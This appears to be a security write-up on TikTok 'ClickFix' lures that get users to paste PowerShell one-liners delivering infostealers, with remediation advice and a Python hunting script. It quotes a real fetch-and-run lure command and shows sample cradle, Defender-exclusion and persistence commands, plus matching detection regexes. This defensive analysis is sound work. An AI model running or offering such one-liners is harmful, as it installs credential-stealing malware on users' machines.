TikTok “ClickFix” Campaigns Keep Pushing Infostealers via One-Line PowerShell Lures


Introduction: the problem and the tactic

Threat actors are publishing TikTok videos that masquerade as quick “activation” or “fix” guides for Windows, Microsoft 365, Adobe apps, CapCut Pro, Discord Nitro, and even streaming services. Viewers are instructed to run a single, copy-pasted PowerShell one-liner as Administrator, which silently pulls and runs a second-stage script that drops infostealers. This is a textbook use of the ClickFix social-engineering technique: get users to execute the malware themselves under the guise of a harmless “fix.”

In brief

  • What’s new: Fresh TikTok videos continue to push one-line PowerShell commands (e.g., iex (irm <domain>/<app>)) that fetch payloads such as Aura (Auro) Stealer; some chains also load an extra .NET-compiled in-memory module of unclear purpose.
  • Why it works: ClickFix relies on user-driven code execution (Run dialog/PowerShell), which sidesteps many automated controls and web filtering.
  • Impact: Exfiltration of browser creds, cookies, crypto wallets, and application secrets; likely account takeovers and downstream business compromise.
  • Scale & precedent: TikTok-based ClickFix campaigns distributing Vidar and StealC were documented earlier in 2025; today’s activity shows the pattern persists and evolves.

Context / history / connections

ClickFix emerged in early 2024 and has since been adopted across phishing, malvertising, and compromised sites—often spoofing brands or CAPTCHAs and instructing users to paste commands into Run/Terminal/PowerShell. Microsoft tracks multiple actors using ClickFix to deliver loaders, RATs, and infostealers (Lumma, Latrodectus, NetSupport, etc.), including macOS targeting. Security teams have also observed kits for sale that generate ClickFix landing pages.

Trend Micro’s May 2025 research highlighted TikTok videos—likely AI-generated—guiding viewers to run one-liners that ultimately delivered Vidar or StealC. Palo Alto Networks Unit 42 later detailed ClickFix chains for Lumma, Latrodectus, and NetSupport with concrete hunting tips, underscoring the technique’s commoditization.

Technical analysis / details of the vulnerability (attack chain)

Recent videos display commands like:

iex (irm slmgr[.]win/photoshop)

The domain segment changes with the “product” being “activated.” Executing the command pulls another PowerShell script, which then downloads two EXEs from Cloudflare Pages. The first (updater.exe) is Aura (Auro) Stealer, which harvests saved browser logins, cookies, crypto wallets, and app credentials. A second payload (source.exe) compiles C# code on the fly (via csc.exe) and injects shellcode in memory, acting as an additional in-memory stage.

Key traits seen across ClickFix:

  • User-level code execution: instructions to open Run/PowerShell and paste code.
  • Living-off-the-land: PowerShell, mshta, regasm, msbuild; heavy use of in-memory execution.
  • Defense evasion: clipboard tricks, obfuscated one-liners, scheduled tasks/persistence, and brand impersonation (e.g., Cloudflare Turnstile lures).

Earlier TikTok chains used similar one-liners (e.g., iex (irm https://<domain>/spotify)), then added Defender exclusions, fetched Vidar/StealC second stages, and set persistence, with C2 resolution via Steam/Telegram dead-drop resolvers (DDR).

Practical consequences / risks

  • Credential & cookie theft → account takeover: Attackers can bypass MFA with session cookies, pivot into corporate SaaS (email, code repos, finance).
  • Rapid replay and resale: Stolen data fuels fraud, ransomware initial access, and marketplace resale.
  • Hybrid targeting: Consumers chasing “free activations” and employees on unmanaged/poorly locked-down machines are both at risk.

Operational recommendations / what to do next

Immediate actions for anyone who ran a TikTok one-liner:

  1. Assume compromise of all stored credentials; rotate passwords and revoke sessions (browsers, email, cloud, crypto, VPN).
  2. Isolate and reimage endpoints if feasible; at minimum, run a reputable EDR scan and check for suspicious scheduled tasks and startup entries.

Enterprise hardening & detection:

  • Policy & UX controls: Disable/limit Run dialog/PowerShell for non-admin users; enable PowerShell Constrained Language Mode where possible.
  • EDR hunts / SIEM analytics (seed queries):
    • Process chains where explorer.exe spawns powershell.exe, followed by network activity soon after.
    • Paste/clipboard events preceding PowerShell or mshta.exe, and creation of scheduled tasks at logon.
    • Look for LOLBins (regasm, msbuild, rundll32) loading .NET assemblies in memory.
  • Web & mail protections: Block known ClickFix infrastructure and lookalike domains; aggressively filter malvertising and brand-spoofed lures.
  • User education: Update awareness content to explicitly say: never copy commands from web/TikTok/File Explorer address bar into system tools. Show real screenshots of lures so staff recognize them.
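As an added example (not code from the article or from any of the cited vendors), the following Python script turns the seed hunts above and the iex (irm <domain>/<app>) cradle from the attack-chain section into runnable detection logic over a handful of constructed Sysmon-style events. The event layout is a simplified stand-in for Sysmon event ID 1 (ProcessCreate) and ID 3 (NetworkConnect) fields, and every PID, timestamp, path and domain in the sample is constructed.

```python
"""Hunting sketch for the TikTok ClickFix chain.

Added example, not code from the article or any cited vendor. It replays
constructed Sysmon-style events (simplified fields for event ID 1 ProcessCreate
and ID 3 NetworkConnect) and flags the pattern described in the article:
explorer.exe -> powershell.exe running an iex/irm download cradle, a network
connection from that shell soon after, a Defender exclusion, and a logon task.
All PIDs, timestamps, paths and the domain are constructed.
"""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# The one-liner shape from the lures, iex (irm <domain>/<app>), plus spelled-out
# aliases and the WebClient variant. PowerShell is case-insensitive, so match that way.
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE,
)
# Defender exclusions added from a command line (seen in the earlier Vidar/StealC chains).
EXCLUSION_RE = re.compile(r"add-mppreference\s+-exclusion(path|process|extension)", re.IGNORECASE)
# schtasks /create ... /sc onlogon: logon-triggered persistence.
SCHTASKS_LOGON_RE = re.compile(r"/create\b.*/sc\s+onlogon\b", re.IGNORECASE)

SHELLS = {"powershell.exe", "pwsh.exe"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Benign: a user opens PowerShell from the Start menu and lists a directory.
    {"ts": "2025-11-10T09:00:00", "id": 1, "pid": 3001, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoExit Get-ChildItem C:\\Users"},
    # Lure: the one-liner pasted into an elevated PowerShell (constructed, defanged domain).
    {"ts": "2025-11-10T09:05:00", "id": 1, "pid": 3002, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe iex (irm example[.]invalid/photoshop)"},
    # Outbound connection from that shell eight seconds later (second-stage fetch).
    {"ts": "2025-11-10T09:05:08", "id": 3, "pid": 3002, "image": PS,
     "dest": "203.0.113.10:443"},
    # Second stage adds a Defender exclusion and a logon task from a child shell.
    {"ts": "2025-11-10T09:05:20", "id": 1, "pid": 3003, "image": PS,
     "parent_image": PS,
     "cmdline": "powershell.exe -w hidden Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"ts": "2025-11-10T09:05:25", "id": 1, "pid": 3004,
     "image": r"C:\Windows\System32\schtasks.exe", "parent_image": PS,
     "cmdline": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\updater.exe /sc onlogon"},
]


def basename(path):
    """Lower-cased file name of a Windows path, so hunts ignore the directory."""
    return PureWindowsPath(path).name.lower()


def hunt(events, window_seconds=60):
    """Return (rule, pid) findings over Sysmon-like events.

    In real Sysmon data key on ProcessGuid rather than PID, since PIDs are reused.
    """
    findings = []
    cradle_shells = {}  # pid -> creation time of a shell that ran a download cradle
    for ev in events:
        if ev["id"] != 1:
            continue
        img, parent = basename(ev["image"]), basename(ev["parent_image"])
        cmd = ev.get("cmdline", "")
        if img in SHELLS and parent == "explorer.exe":
            # Shell started from the desktop (Run dialog / Start menu): noisy alone,
            # but it is the launch path ClickFix instructions produce.
            findings.append(("interactive_shell_from_explorer", ev["pid"]))
            if CRADLE_RE.search(cmd):
                findings.append(("download_cradle_one_liner", ev["pid"]))
                cradle_shells[ev["pid"]] = datetime.fromisoformat(ev["ts"])
        if EXCLUSION_RE.search(cmd):
            findings.append(("defender_exclusion_added", ev["pid"]))
        if img == "schtasks.exe" and SCHTASKS_LOGON_RE.search(cmd):
            findings.append(("logon_scheduled_task", ev["pid"]))
    # Second pass: network activity from a cradle shell within the time window.
    for ev in events:
        if ev["id"] == 3 and ev["pid"] in cradle_shells:
            delta = datetime.fromisoformat(ev["ts"]) - cradle_shells[ev["pid"]]
            if timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                findings.append(("network_soon_after_cradle", ev["pid"]))
    return findings


def high_confidence(findings):
    """PIDs that both ran a download cradle and reached the network right after."""
    by_pid = {}
    for rule, pid in findings:
        by_pid.setdefault(pid, set()).add(rule)
    return sorted(pid for pid, rules in by_pid.items()
                  if {"download_cradle_one_liner", "network_soon_after_cradle"} <= rules)


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for rule, pid in results:
        print(f"{rule:32s} pid={pid}")
    print("high-confidence ClickFix shells:", high_confidence(SAMPLE_EVENTS and results))
```

On its own the explorer.exe spawning powershell.exe rule fires for every user who opens a shell from the Start menu (the benign pid 3001 above), which is why the script only escalates when the same process also carried a download cradle and made an outbound connection within the window; the exclusion and schtasks rules are independent and worth alerting on regardless of parent.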

Differences / comparisons with other cases

  • Classic ClickFix vs. TikTok variant: Early waves used HTML attachments or fake update pages to auto-copy commands. The TikTok flavor moves the entire social-engineering script into the video itself, reducing on-page indicators and content for defenses to scan.
  • Payload diversity: Today’s TikTok cases show Aura alongside earlier Vidar/StealC chains; broader ClickFix activity also drops Lumma, Latrodectus, NetSupport, and even macOS payloads.

Summary / key takeaways

  • TikTok remains an active distribution surface for ClickFix, instructing users to self-execute one-liners that fetch infostealers.
  • The chain often uses Cloudflare Pages/CDN infrastructure, in-memory .NET stages, and scheduled tasks for persistence.
  • Treat any endpoint where such commands ran as compromised; rotate credentials and hunt for LOLBin-based, fileless execution.

Sources / bibliography

  1. BleepingComputer — TikTok videos continue to push infostealers in ClickFix attacks (campaign specifics, the slmgr[.]win command, Aura payloads).
  2. SANS Internet Storm Center, Xavier Mertens — TikTok Videos Promoting Malware Installation (deep dive: updater.exe/Aura, source.exe self-compiling stage, persistence).
  3. Trend Micro — TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC (earlier TikTok ClickFix wave, TTPs/IOCs).
  4. Microsoft Security — Think before you Click(Fix) (technique evolution, attack chain, beyond-Windows targeting, guidance).
  5. Palo Alto Networks Unit 42 — Fix the Click: Preventing the ClickFix Attack Vector (hunting tips, examples for Lumma/Latrodectus/NetSupport).